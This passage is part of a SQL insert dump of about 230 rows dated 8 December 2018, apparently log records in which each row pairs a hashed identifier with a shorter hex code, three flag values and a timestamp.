(35965, 'fe02b03ae6e88abb1d44a8179b8eecd2', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-08 05:19:50'),
(35966, '23acb0e463b8b58292b1212a09fe3b06', '480824a480399309', 0, 2, 1, '2018-12-08 05:19:55'),
(35967, '99485ee89c32a75edde0767618306d91', '67d9c3341cc72093', 0, 2, 1, '2018-12-08 05:20:39'),
(35968, 'a0435bd14b7e00d711e6cd947f6db8a4', '4574603cf07e6399', 0, 2, 1, '2018-12-08 05:20:50'),
(35969, '0a7f37aa71bd06dab17162745b4c7e85', '2e0993813af01f77', 0, 2, 1, '2018-12-08 05:21:13'),
(35970, 'a0435bd14b7e00d711e6cd947f6db8a4', '4574603cf07e6399', 0, 2, 1, '2018-12-08 05:21:20'),
(35971, '1b4bc114ba07c0934f2ac8ba6386098d', 'afa4f258bef590a2', 0, 2, 1, '2018-12-08 05:21:35'),
(35972, '3d66b7601a9f466f2ab8b80aec510cdf', '6092d6c1cb041b23', 0, 2, 1, '2018-12-08 05:21:44'),
(35973, 'fe02b03ae6e88abb1d44a8179b8eecd2', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-08 05:22:00'),
(35974, '3ebf75f3ca9f4e84395590987b50dc42', 'b5569667369b4c76', 0, 2, 1, '2018-12-08 05:22:07'),
(35975, '8a330ad103bf52753d6d076810631a15', '12fc4b801e5257e8', 0, 2, 1, '2018-12-08 05:22:13'),
(35976, '3ebf75f3ca9f4e84395590987b50dc42', 'b5569667369b4c76', 0, 2, 1, '2018-12-08 05:22:17'),
(35977, '28cba0bdbe597ac0eeb434255e1c30dd', '74aba437eea39f30', 0, 2, 1, '2018-12-08 05:22:17'),
(35978, '8a330ad103bf52753d6d076810631a15', '12fc4b801e5257e8', 0, 2, 1, '2018-12-08 05:22:26'),
(35979, '3427680af3749e72a2ef1817e015a849', '0902ab385ee8a898', 0, 2, 1, '2018-12-08 05:22:30'),
(35980, 'a0435bd14b7e00d711e6cd947f6db8a4', '4574603cf07e6399', 0, 2, 1, '2018-12-08 05:22:43'),
(35981, 'cba9f48c2ff46ea352e1b09bb28d7409', '3720e464c782ec77', 0, 2, 1, '2018-12-08 05:22:54'),
(35982, '36cdc8a1087bfe6766a47a50c9291c4c', '7ad504ff8801f3a7', 0, 2, 1, '2018-12-08 05:22:59'),
(35983, '1c4c5e7e09239cfd243ed5ab40a1226c', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-08 05:23:06'),
(35984, '36cdc8a1087bfe6766a47a50c9291c4c', '7ad504ff8801f3a7', 0, 2, 1, '2018-12-08 05:23:16'),
(35985, '36cdc8a1087bfe6766a47a50c9291c4c', '7ad504ff8801f3a7', 0, 2, 1, '2018-12-08 05:23:35'),
(35986, '40260180606c46e573bcc157ada11d45', '60d31e10d015bdfe', 0, 2, 1, '2018-12-08 05:24:14'),
(35987, 'cba9f48c2ff46ea352e1b09bb28d7409', '3720e464c782ec77', 0, 2, 1, '2018-12-08 05:24:23'),
(35988, 'a0435bd14b7e00d711e6cd947f6db8a4', '4574603cf07e6399', 0, 2, 1, '2018-12-08 05:24:28'),
(35989, '40260180606c46e573bcc157ada11d45', '60d31e10d015bdfe', 0, 2, 1, '2018-12-08 05:25:03'),
(35990, 'f3cb565ed6858c98daf238c754d530fc', '471e356b82ae8f37', 0, 2, 1, '2018-12-08 05:25:08'),
(35991, 'd3b60fd51e96655ea2d0742d7cf5e18e', '77d629067fed3a03', 0, 2, 1, '2018-12-08 05:25:17'),
(35992, 'a450fc8fcf180ea5f466204325f326a9', '7501b42c35accff7', 0, 2, 1, '2018-12-08 05:25:32'),
(35993, 'd125246857c1454e0404d80df358d48c', '552f828db01a4f62', 0, 2, 1, '2018-12-08 05:25:50'),
(35994, '96d7288c5e92f9524a87524dc87a94f9', '91d21119de46096c', 0, 2, 1, '2018-12-08 05:26:08'),
(35995, '3eb890d16065c40688dfde833ecb3e20', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-08 05:26:10'),
(35996, 'c05912917ae2b552c33c5041b77e8a30', 'fc794f0a80972404', 0, 2, 1, '2018-12-08 05:26:16'),
(35997, '96d7288c5e92f9524a87524dc87a94f9', '91d21119de46096c', 0, 2, 1, '2018-12-08 05:26:21'),
(35998, '3d66b7601a9f466f2ab8b80aec510cdf', '6092d6c1cb041b23', 0, 2, 1, '2018-12-08 05:26:31'),
(35999, 'a0435bd14b7e00d711e6cd947f6db8a4', '4574603cf07e6399', 0, 2, 1, '2018-12-08 05:26:41'),
(36000, 'c05912917ae2b552c33c5041b77e8a30', 'fc794f0a80972404', 0, 2, 1, '2018-12-08 05:27:00'),
(36001, 'd1cd37163829acf3e9149ca2dcfa60d2', 'd253aa15f0650852', 0, 2, 1, '2018-12-08 05:27:53'),
(36002, '6d874addb930089fccae9cd117796af7', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-08 05:27:57'),
(36003, '6977f8c3926693239be33bb89e9b7f28', 'dea6dcd8d8bf7f3b', 0, 2, 1, '2018-12-08 05:28:15'),
(36004, '24fa6c340f5e4aff6bc3cbb8894e36e2', 'f7eeb8c92946914e', 0, 2, 1, '2018-12-08 05:29:20'),
(36005, 'c81871574b1c0942ff4cc2fd3df202fa', '4c07673592205f17', 0, 2, 1, '2018-12-08 05:29:59'),
(36006, '6eb27b60a021ff1180b385b9de863bfa', '094c4fc3019f9165', 0, 2, 1, '2018-12-08 05:30:02'),
(36007, '31948fdd60ff5689b5ef1e82cf2440e4', 'a06df92c3e268263', 0, 2, 1, '2018-12-08 05:30:35'),
(36008, '6eb27b60a021ff1180b385b9de863bfa', '094c4fc3019f9165', 0, 2, 1, '2018-12-08 05:30:39'),
(36009, '612312906782bc40333d5128d04333db', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-08 05:31:17'),
(36010, '612312906782bc40333d5128d04333db', 'f11ab2838fdcb085', 0, 2, 1, '2018-12-08 05:31:26'),
(36011, '5b942fa76066e4de404b5a5c44775e64', 'e3163f1046dc4449', 0, 2, 1, '2018-12-08 05:31:31'),
(36012, '004f3ba3b6261790dc7314d0e9fc70da', 'c858904cdd51199c', 0, 2, 1, '2018-12-08 05:33:18'),
(36013, 'b9dc782308ec94642f5556b2052f87b2', '07eb4228c690f310', 0, 2, 1, '2018-12-08 05:33:32'),
(36014, '92b5a03bc0cc6074ecfb330ac95a1948', 'ead365992b655192', 0, 2, 1, '2018-12-08 05:33:37'),
(36015, '92b5a03bc0cc6074ecfb330ac95a1948', 'ead365992b655192', 0, 2, 1, '2018-12-08 05:34:05'),
(36016, '0f8737b2320c90a4db3a5a24f0abe0ce', 'e2c8791634be976d', 0, 2, 1, '2018-12-08 05:34:54'),
(36017, '3d66b7601a9f466f2ab8b80aec510cdf', '6092d6c1cb041b23', 0, 2, 1, '2018-12-08 05:37:47'),
(36018, 'eafa2c756b8a4ad34fccbfa331423047', '6092d6c1cb041b23', 0, 2, 1, '2018-12-08 05:37:57'),
(36019, 'a0435bd14b7e00d711e6cd947f6db8a4', '4574603cf07e6399', 0, 2, 1, '2018-12-08 05:38:43'),
(36020, '92b5a03bc0cc6074ecfb330ac95a1948', 'ead365992b655192', 0, 2, 1, '2018-12-08 05:39:21'),
(36021, '92b5a03bc0cc6074ecfb330ac95a1948', 'ead365992b655192', 0, 2, 1, '2018-12-08 05:39:44'),
(36022, 'e76bd665a9dc303f90d6f23bdef3b255', '5a08da7046298e7a', 0, 2, 1, '2018-12-08 05:39:57'),
(36023, '272d276274c953221df1581cb7d952ea', '347fcfc60847ec8a', 0, 2, 1, '2018-12-08 05:40:28'),
(36024, '33993df5284eadf691a3397cdb308377', 'c0d620ee8725a926', 0, 2, 1, '2018-12-08 05:41:47'),
(36025, '9560064243b2be4318665a1040ddfb77', 'f8f101495173843a', 0, 2, 1, '2018-12-08 05:41:55'),
(36026, '9560064243b2be4318665a1040ddfb77', 'f8f101495173843a', 0, 2, 1, '2018-12-08 05:42:11'),
(36027, '40260180606c46e573bcc157ada11d45', '60d31e10d015bdfe', 0, 2, 1, '2018-12-08 05:42:20'),
(36028, 'db6956d18d07478930e3c9ace90ab5be', '27d3b62cdd82d36e', 0, 2, 1, '2018-12-08 05:43:59'),
(36029, '6eb27b60a021ff1180b385b9de863bfa', '094c4fc3019f9165', 0, 2, 1, '2018-12-08 05:45:59'),
(36030, 'a6a756525150cc65368c32cd9f0d76e2', '7c7d13aa06c882ae', 0, 2, 1, '2018-12-08 05:47:20'),
(36031, 'ea368a4d0181a0c78bc1805f6dcd4bef', '9fa71c818742c95f', 0, 2, 1, '2018-12-08 05:50:15'),
(36032, 'ca15be3d4a8d9e8c95dedc0b4fae7f87', 'cd84610bb2f615f5', 0, 2, 1, '2018-12-08 05:50:38'),
(36033, 'ca15be3d4a8d9e8c95dedc0b4fae7f87', 'cd84610bb2f615f5', 0, 2, 1, '2018-12-08 05:50:46'),
(36034, '43ea95f2b2b0e51e562f50eb86d9886f', '5ca98ea27a20b35b', 0, 2, 1, '2018-12-08 05:51:45'),
(36035, '0f8737b2320c90a4db3a5a24f0abe0ce', 'e2c8791634be976d', 0, 2, 1, '2018-12-08 05:54:34'),
(36036, 'b9dc782308ec94642f5556b2052f87b2', '07eb4228c690f310', 0, 2, 1, '2018-12-08 05:59:44'),
(36037, '394da209ed2f64017c7812357a9b42aa', 'ac1257653a309ba1', 0, 2, 1, '2018-12-08 06:00:40'),
(36038, '394da209ed2f64017c7812357a9b42aa', 'ac1257653a309ba1', 0, 2, 1, '2018-12-08 06:00:57'),
(36039, '8e26c91c43fb2dadcfe288c744c0b886', '1ec75219d7482e28', 0, 2, 1, '2018-12-08 06:02:19'),
(36040, '3eb890d16065c40688dfde833ecb3e20', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-08 06:04:17'),
(36041, '4b9f78fcfc75e79a17b64986a1e94f26', '7229dec169689d18', 0, 2, 1, '2018-12-08 06:05:33'),
(36042, '4b9f78fcfc75e79a17b64986a1e94f26', '7229dec169689d18', 0, 2, 1, '2018-12-08 06:06:18'),
(36043, '78bcd0c9e581bc83c4896c708b45381e', '6e117bd555667400', 0, 2, 1, '2018-12-08 06:08:08'),
(36044, 'fbbea8c87676c200bbf19fc475056bc0', '4574603cf07e6399', 0, 2, 1, '2018-12-08 06:09:06'),
(36045, 'fe029aea0a5c702e6bc0987d8d4c0639', 'f5ea342846f5c547', 0, 2, 1, '2018-12-08 06:10:07'),
(36046, 'fe029aea0a5c702e6bc0987d8d4c0639', 'f5ea342846f5c547', 0, 2, 1, '2018-12-08 06:10:16'),
(36047, '4b9f78fcfc75e79a17b64986a1e94f26', '7229dec169689d18', 0, 2, 1, '2018-12-08 06:12:28'),
(36048, '4b9f78fcfc75e79a17b64986a1e94f26', '7229dec169689d18', 0, 2, 1, '2018-12-08 06:15:03'),
(36049, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-08 06:15:11'),
(36050, '2c9ba76193161f3c7b73cc7c30680124', '7829c95e3f09f30f', 0, 2, 1, '2018-12-08 06:15:12'),
(36051, '4b9f78fcfc75e79a17b64986a1e94f26', '7229dec169689d18', 0, 2, 1, '2018-12-08 06:15:32'),
(36052, '2c9ba76193161f3c7b73cc7c30680124', '7829c95e3f09f30f', 0, 2, 1, '2018-12-08 06:16:44'),
(36053, '644fda0814a2d3b2a27da4757de7392c', '3e53f700064aedd2', 0, 2, 1, '2018-12-08 06:17:47'),
(36054, 'bcf44e2170eed9eaf819293f8e1d4dea', '7ad504ff8801f3a7', 0, 2, 1, '2018-12-08 06:19:17'),
(36055, 'ead413c906d83c69ee85d852b8c08f80', '525abb4dc04ca54a', 0, 2, 1, '2018-12-08 06:19:33'),
(36056, 'fe029aea0a5c702e6bc0987d8d4c0639', 'f5ea342846f5c547', 0, 2, 1, '2018-12-08 06:19:44'),
(36057, 'fe029aea0a5c702e6bc0987d8d4c0639', 'f5ea342846f5c547', 0, 2, 1, '2018-12-08 06:19:53'),
(36058, 'ead413c906d83c69ee85d852b8c08f80', '525abb4dc04ca54a', 0, 2, 1, '2018-12-08 06:22:42'),
(36059, 'ead413c906d83c69ee85d852b8c08f80', '525abb4dc04ca54a', 0, 2, 1, '2018-12-08 06:24:39'),
(36060, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 06:35:11'),
(36061, 'c1b2dc5073749bf6232940b698ee795f', '4e85c20b27a9d7c7', 0, 2, 1, '2018-12-08 06:37:29'),
(36062, '6f68b669468faa4c299cdbec2138fddd', '99ddf52c8ba9b467', 0, 2, 1, '2018-12-08 06:41:22'),
(36063, '6391aabaa5a73b99bb2fe2ee570e9056', '6a4507b4da55ef6e', 0, 2, 1, '2018-12-08 06:44:58'),
(36064, '39177e428e039ce9bd0078e629c571b9', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-08 06:47:32'),
(36065, '39177e428e039ce9bd0078e629c571b9', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-08 06:53:50'),
(36066, '39177e428e039ce9bd0078e629c571b9', 'd35ca4d563421a7c', 0, 2, 1, '2018-12-08 06:55:23'),
(36067, '2537dc701655a47d0d05cb164c1d3f26', '3e53f700064aedd2', 0, 2, 1, '2018-12-08 07:04:01'),
(36068, '2537dc701655a47d0d05cb164c1d3f26', '3e53f700064aedd2', 0, 2, 1, '2018-12-08 07:04:41'),
(36069, '6f68b669468faa4c299cdbec2138fddd', '99ddf52c8ba9b467', 0, 2, 1, '2018-12-08 07:07:13'),
(36070, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 07:11:40'),
(36071, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 07:11:51'),
(36072, '962ed579069faf122b4d8132b975caf2', '3916a1b724c2c6af', 0, 2, 1, '2018-12-08 07:16:13'),
(36073, 'f7a00568a2824f9f976b5c8bdf2bc5fd', '6db6845840e4754a', 0, 2, 1, '2018-12-08 07:17:07'),
(36074, '41a21f0b88c532c28b03999892e364a1', 'df27b9a2919a8206', 0, 2, 1, '2018-12-08 07:56:01'),
(36075, '41a21f0b88c532c28b03999892e364a1', 'df27b9a2919a8206', 0, 2, 1, '2018-12-08 07:56:07'),
(36076, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 07:57:28'),
(36077, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 07:57:44'),
(36078, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 07:58:10'),
(36079, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:03:04'),
(36080, '6e084c035d523ae48141e4bcdea93275', 'dd0438c71cec594e', 0, 2, 1, '2018-12-08 08:03:15'),
(36081, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:04:35'),
(36082, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:05:11'),
(36083, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:05:46'),
(36084, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:06:11'),
(36085, '6e084c035d523ae48141e4bcdea93275', 'dd0438c71cec594e', 0, 2, 1, '2018-12-08 08:06:13'),
(36086, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:07:28'),
(36087, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:11:22'),
(36088, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:11:50'),
(36089, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:11:53'),
(36090, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:12:15'),
(36091, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:13:56'),
(36092, '3deab8956663b2096a28f8c7c237dc81', 'da4a9942f66aa289', 0, 2, 1, '2018-12-08 08:14:15'),
(36093, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:16:32'),
(36094, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:17:30'),
(36095, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:19:19'),
(36096, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:20:37'),
(36097, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:21:25'),
(36098, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:21:46'),
(36099, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:23:07'),
(36100, 'dfa8c05fd1538ff6c19ad55b6b8ae6ea', '7c9dd16a77467473', 0, 2, 1, '2018-12-08 08:27:41'),
(36101, '88b4a762e14cf71b354731458e8fae39', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 08:31:25'),
(36102, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:35:14'),
(36103, '36587ac784b6196c1fbcfaa00212bee4', '930419cada1942c4', 0, 2, 1, '2018-12-08 08:36:39'),
(36104, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:37:07'),
(36105, '36587ac784b6196c1fbcfaa00212bee4', '930419cada1942c4', 0, 2, 1, '2018-12-08 08:38:40'),
(36106, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 08:42:59'),
(36107, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:44:42'),
(36108, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:52:20'),
(36109, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:52:57'),
(36110, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 08:54:12'),
(36111, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 08:54:33'),
(36112, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:57:47'),
(36113, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 08:59:28'),
(36114, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 08:59:45'),
(36115, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 09:00:24'),
(36116, 'b83cf7e519013886df457c9a04dcf52a', '0dab6c0050d249ca', 0, 2, 1, '2018-12-08 09:01:41'),
(36117, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:01:52'),
(36118, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 09:01:54'),
(36119, '1929bd0d7fd2ce0806a7652dc8b84dd7', 'b00ce052a9850e4b', 0, 2, 1, '2018-12-08 09:02:11'),
(36120, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 09:02:13'),
(36121, '1929bd0d7fd2ce0806a7652dc8b84dd7', 'b00ce052a9850e4b', 0, 2, 1, '2018-12-08 09:02:20'),
(36122, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 09:03:58'),
(36123, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 09:04:00'),
(36124, '1929bd0d7fd2ce0806a7652dc8b84dd7', 'b00ce052a9850e4b', 0, 2, 1, '2018-12-08 09:04:00'),
(36125, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 09:04:40'),
(36126, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:04:44'),
(36127, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:05:05'),
(36128, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:05:17'),
(36129, '3928b3c58efea8ad95ce9702196aac36', '175b72b9380c40ec', 0, 2, 1, '2018-12-08 09:05:20'),
(36130, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:05:45'),
(36131, '6e4f5a0d419010148803b14fbb03f810', 'e74a2ac966dcd07f', 0, 2, 1, '2018-12-08 09:05:48'),
(36132, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 09:08:57'),
(36133, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 09:09:11'),
(36134, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 09:09:44'),
(36135, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 09:09:50'),
(36136, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:10:35'),
(36137, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 09:10:57'),
(36138, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 09:11:23'),
(36139, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 09:11:40'),
(36140, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 09:11:45'),
(36141, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:13:10'),
(36142, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 09:14:02'),
(36143, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 09:14:12'),
(36144, '33feccebfe2d18f001b4cc1b07f23503', '906e46850c5eb4c3', 0, 2, 1, '2018-12-08 09:14:50'),
(36145, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:15:49'),
(36146, 'ba94add5418aeb8acf7e7f4e95f24724', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 09:16:48'),
(36147, 'b8b12e6b5a52f555e2521079e5d78f5e', '88bd756694325aee', 0, 2, 1, '2018-12-08 09:17:46'),
(36148, '41a21f0b88c532c28b03999892e364a1', 'df27b9a2919a8206', 0, 2, 1, '2018-12-08 09:18:36'),
(36149, '41a21f0b88c532c28b03999892e364a1', 'df27b9a2919a8206', 0, 2, 1, '2018-12-08 09:18:43'),
(36150, '41a21f0b88c532c28b03999892e364a1', 'df27b9a2919a8206', 0, 2, 1, '2018-12-08 09:18:53'),
(36151, 'd127f3e89b635b07136470beb5f1a033', 'a74e855d9edcd019', 0, 2, 1, '2018-12-08 09:20:14'),
(36152, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-12-08 09:26:11'),
(36153, 'b8b12e6b5a52f555e2521079e5d78f5e', '88bd756694325aee', 0, 2, 1, '2018-12-08 09:27:42'),
(36154, 'a169cdadf99c0cff43b57e963a4dd65c', '4e1e2b3ad77030d5', 0, 2, 1, '2018-12-08 09:33:53'),
(36155, 'a169cdadf99c0cff43b57e963a4dd65c', '4e1e2b3ad77030d5', 0, 2, 1, '2018-12-08 09:34:11'),
(36156, '8681b7425079054dd581f0a03edd6bdb', '65b74352ddc575c7', 0, 2, 1, '2018-12-08 09:45:11'),
(36157, '1c32ce0897a34d2d65c71ca84ff69bc5', '09c917de4c1bed0e', 0, 2, 1, '2018-12-08 09:47:03'),
(36158, '2df6401e3d98801c217335e5f3b77113', 'd29852129d325244', 0, 2, 1, '2018-12-08 09:56:53'),
(36159, '2df6401e3d98801c217335e5f3b77113', 'd29852129d325244', 0, 2, 1, '2018-12-08 09:58:44'),
(36160, '2df6401e3d98801c217335e5f3b77113', 'd29852129d325244', 0, 2, 1, '2018-12-08 10:06:41'),
(36161, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-12-08 10:08:30'),
(36162, '3928b3c58efea8ad95ce9702196aac36', '175b72b9380c40ec', 0, 2, 1, '2018-12-08 10:12:22'),
(36163, 'b40d05fd10b1ccb33f2ada7794e2a657', '3e53f700064aedd2', 0, 2, 1, '2018-12-08 10:16:10'),
(36164, 'c572c173a0cb09baf61e430012b4591b', '6e516b931cc4b190', 0, 2, 1, '2018-12-08 10:33:23'),
(36165, 'e581864d09930b661268b0c12b7225ee', '12ed21842ec29d17', 0, 2, 1, '2018-12-08 10:34:32'),
(36166, '46bcb5c69a0cfccc5c36e8f38dfbe520', '3e53f700064aedd2', 0, 2, 1, '2018-12-08 10:35:57'),
(36167, 'e581864d09930b661268b0c12b7225ee', '12ed21842ec29d17', 0, 2, 1, '2018-12-08 10:37:53'),
(36168, 'ad8dde9f5b7a66718affee414fea342a', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-08 10:41:02'),
(36169, '29bd0d8d5d23526f26c459e301001ea5', '376757e48be1d103', 0, 2, 1, '2018-12-08 10:43:19'),
(36170, '0d9a4b0b31208bb1066fe6f039852712', 'ca871caa5a390921', 0, 2, 1, '2018-12-08 10:44:33'),
(36171, '0d9a4b0b31208bb1066fe6f039852712', 'ca871caa5a390921', 0, 2, 1, '2018-12-08 10:48:10'),
(36172, 'e581864d09930b661268b0c12b7225ee', '12ed21842ec29d17', 0, 2, 1, '2018-12-08 10:56:03'),
(36173, 'e581864d09930b661268b0c12b7225ee', '12ed21842ec29d17', 0, 2, 1, '2018-12-08 10:58:01'),
(36174, '4141099f9d531c6e67380b15560cb89d', '1fe68226bb896748', 0, 2, 1, '2018-12-08 11:02:13'),
(36175, '8656e9e3e1fadcd4f2cb7a7086bf7504', '40edb881ea42040f', 0, 2, 1, '2018-12-08 11:05:58'),
(36176, '4141099f9d531c6e67380b15560cb89d', '1fe68226bb896748', 0, 2, 1, '2018-12-08 11:07:15'),
(36177, '13eafe1ea2adae1a4181cdf1f73dc0de', '59194155543894ef', 0, 2, 1, '2018-12-08 11:13:48'),
(36178, 'bdef254c423537ac54f82c3564392b2b', '6f8a260dd974c75c', 0, 2, 1, '2018-12-08 11:17:40'),
(36179, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 11:28:39'),
(36180, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 11:34:12'),
(36181, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 11:34:19'),
(36182, '21641c6f148be056538f89e82dbf1503', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-08 11:34:36'),
(36183, '34ed442aeb7d0aa71c0b2aa508e40695', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 11:34:59'),
(36184, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 11:35:01'),
(36185, 'ba466d5d2a8cc4e51a2f93b57f25dbf9', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-08 11:35:17'),
(36186, '34ed442aeb7d0aa71c0b2aa508e40695', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 11:35:23'),
(36187, '34ed442aeb7d0aa71c0b2aa508e40695', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 11:35:56'),
(36188, '34ed442aeb7d0aa71c0b2aa508e40695', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 11:36:08'),
(36189, '34ed442aeb7d0aa71c0b2aa508e40695', 'cad202a09758cb3a', 0, 2, 1, '2018-12-08 11:36:27'),
(36190, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 11:37:15'),
(36191, 'e581864d09930b661268b0c12b7225ee', '12ed21842ec29d17', 0, 2, 1, '2018-12-08 11:37:23'),
(36192, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 11:37:37'),
(36193, 'e581864d09930b661268b0c12b7225ee', '12ed21842ec29d17', 0, 2, 1, '2018-12-08 11:37:54'),
(36194, '4fdccec93e465cd1e61747e638d947e8', '687058b58830fd3e', 0, 2, 1, '2018-12-08 11:37:58'),
